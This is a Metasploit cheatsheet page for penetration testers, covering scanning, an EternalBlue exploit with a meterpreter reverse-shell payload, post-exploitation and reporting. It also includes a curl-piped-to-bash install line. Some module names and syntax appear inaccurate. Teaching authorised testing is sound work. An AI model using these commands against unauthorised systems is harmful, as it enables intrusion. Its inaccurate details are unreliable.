Metasploit Framework Cheatsheet for Penetration Testers

🤖 AI Prompts Cheatsheet

Daniel Osei — AI-Assisted Security Engineer

What is Metasploit Framework?

Metasploit Framework is an open-source penetration testing platform that enables security professionals to find and exploit vulnerabilities in systems. It provides a suite of tools for offensive security, including exploits, payloads, and post-exploitation modules.

Installation

To install Metasploit, you can use various methods based on your operating system:

For Kali Linux, it comes pre-installed. Update using sudo apt update && sudo apt upgrade.

For Ubuntu:

curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/msfupdate | bash

For Windows, download the installer from the Metasploit website.

Basic Syntax

The basic syntax to launch the Metasploit console is:

msfconsole

Discovery

Perform network discovery to gather information about the target environment.

Network Scanning

use auxiliary/scanner/portscan/tcp
set RHOSTS [Target IP]
run

Scanning for Vulnerabilities

use auxiliary/scanner/smb/smb_version
set RHOSTS [Target IP]
run

Exploitation

Use exploits to gain access to the target system.

Exploit a Specific Vulnerability

use exploit/windows/smb/ms17_010_eternalblue
set RHOST [Target IP]
set LHOST [Your IP]
exploit

Payloads

Specify the payload you want to use with your exploit:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Post-Exploitation

After successful exploitation, you can use post-exploitation modules.

use post/windows/manage/priv_mgmt
set SESSION [Session ID]
run

Reporting

Generate reports of your findings:

report -o /path/to/report -f xml

Quick Reference Table

Flag	Description
RHOSTS	Target IP address(es)
LHOST	Your local IP address

Pro Tips

Use search [keyword] to quickly find exploits and auxiliary modules.
Chain multiple exploits using sessions: sessions -i [Session ID] to interact with a specific session.

Real-World Examples

Use these structured commands in your pen-testing engagements:

# TCP Port Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# SMB Version Detection
use auxiliary/scanner/smb/smb_version
set RHOSTS [Target IP]
run

Metasploit Framework Cheatsheet for Penetration Testers

What is Metasploit Framework?

Installation

Basic Syntax

Discovery

Network Scanning

Scanning for Vulnerabilities

Exploitation

Exploit a Specific Vulnerability

Payloads

Post-Exploitation

Reporting

Quick Reference Table

Pro Tips

Real-World Examples

Categories

Recent Posts

What is Metasploit Framework?

Installation

Basic Syntax

Discovery

Network Scanning

Scanning for Vulnerabilities

Exploitation

Exploit a Specific Vulnerability

Payloads

Post-Exploitation

Reporting

Quick Reference Table

Pro Tips

Real-World Examples

Related Posts

Kali Linux: The Penetration Testing Toolkit Cheatsheet

Comprehensive Guide to Using Wireshark for Network Analysis

Practical Security Tool Cheatsheet: Nmap